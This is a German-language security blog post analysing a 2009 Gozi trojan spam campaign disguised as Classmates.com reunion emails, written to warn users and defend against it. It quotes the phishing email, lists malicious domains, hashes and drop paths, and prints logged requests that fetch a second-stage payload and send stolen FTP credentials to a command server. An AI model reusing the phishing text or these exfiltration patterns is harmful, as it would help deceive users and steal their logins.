Tag Archive for 'videoplayerkodeck.com'

Trojaner “Gozi” tarnt sich als E-mail von Classmates.com

Seit heute Morgen verbreitet sich der Trojaner Gozi, welcher uns bereits vom letzten Jahr her bekannt ist (siehe Post “Porno-Mails verbreiten Malware in der Schweiz” und “Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins”), über eine neue Spam-Welle:

Von: “Favors Committee” personalcenter@classmates.com
Betreff: Classmates Important Meeting Information

We are pleased to announce Class Reunion on January 24, 2009.

“Please join us for a night of fun as we celebrate our 2009 Year Class Reunion.
We don’t want to let another year go by without the opportunity for all of us to get together, reminisce about old times and learn about what our old friends have been up to.”

Proceed to view Your message:

http://classmates.profile.OnlineServlet.user-m5wy5irlu.coreupdtates.com/login_video737.htm?/default/LOGIN=rly3pelivndgc0y

With best regards, Wilda Groves. Customer Service Department.
Copyright 1995-2008 Classmates Online, Inc. All Rights Reserved.

E-Mail Text sowie die Absender E-Mail Adresse (personalcenter@classmates.com) ist jeweils gleich. Der Betreff der Spam-Mails unterscheidet sich jedoch:

  • Classmates Important Meeting Information
  • Reunion Classmates Notification!
  • Classmates Reunion Soon – [Class Reunion] Save the Date
  • Do-Not-Miss Classmates reunion.
  • Classmates Organiser Warning – Classmates Organisation.Have any special memories from when we were in high school?
  • Classmates Reunion – Invitation: Ready
  • Im Unterschied zur letzten Spam-Welle zielt der Trojaner dieses mal nicht explizit auf die Schweiz ab. Das E-Mail enthält jeweils einen langen Link auf eine der folgenden Webseiten:

  • coreupdtates.com
  • installkodekforwin.com
  • videoplayerkodeck.com
  • windowsmediakodeck.com
  • Die Domains werden wieder einmal mehr auf einem FastFlux Botnet gehostet (mit einer TTL von 1800 Sekunden):

    gozi_fastflux

    Besucht man eine der in den Spam-Mails angepriesenen Webseiten, wird dem Besucher sofort eine EXE-Datei zum download angeboten:

    gozi_jan09

    Die angebotene Datei ADMedia_Player.exe enthält den Trojaner Gozi, welcher derzeit von den Antivirenherstellern noch nicht all zu gut erkannt wird:

    Filename: ADMedia_Player.exe
    File size: 14933 bytes
    MD5…: 3427ffd0f5861a8170f7225395b7d3c3
    SHA1..: 53bc0d796cd603952cc9ab6c3f5065c3992711ca
    Erkennungsrate: 9/39 (23.08%)

    Nach ausführen der EXE-Datei nistet sich der Trojaner (wie auch letztes mal schon) im WINDOWS-Verzeichnis des Systems ein:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys

    Kurz danach lädt der Trojaner weiteren Schadcode von resetflash.com nach (welche ebenfalls auf einem FastFlux Botnet gehostet ist):

    GET http://resetflash.com/flash.exe

    Filename: flash.exe
    File size: 36864 bytes
    MD5…: 87255d2928f3abfcdecc6255a84b0196
    SHA1..: 334ccfbeeea45e9c73cc7e3a2a3c6f0003d14987
    Erkennungsrate: 3/39 (7.69%)

    Der Trojaner zeichnet nun sämtliche HTTP, HTTPS und FTP Logins auf, welche vom infizierten Rechner aus gemacht werden und sendet die gesammelten credentials an einen Command&Controll Server (91.211.65.30 – Ural Industrial Limited Company RU):

    POST /cgi-bin/post.cgi HTTP/1.1
    Content-Type: multipart/form-data;
    User-Agent: IE
    Host: 91.211.65.30
    Content-Length: 363
    Cache-Control: no-cache

    —————————-6e6ea6e6ea6e6ea
    Content-Disposition: form-data; name=”upload_file”;
    Content-Type: application/octet-stream

    URL: sniffer_ftp
    ftp_server=ftp.serverdesopfers.ch&ftp_login=username&ftp_pass=passwort&version=0
    —————————-6e6ea6e6ea6e6ea–

    Fazit

    Da das E-Mail in englisch verfasst ist sowie viele Schweizer Internet Nutzer den Dienst “Classmates.com” nicht einmal kennen, dürften nur wenige Rechner in der Schweiz infiziert worden. Um eine Infektion vorzubeugen empfiehlt es sich für Unternehmen trotzdem, den Zugang zu folgenden Domains / IP Adressen zu unterbinden:

  • coreupdtates.com
  • installkodekforwin.com
  • videoplayerkodeck.com
  • windowsmediakodeck.com
  • resetflash.com
  • 91.211.65.30



  • economics-recluse
    Scene
    Urgent!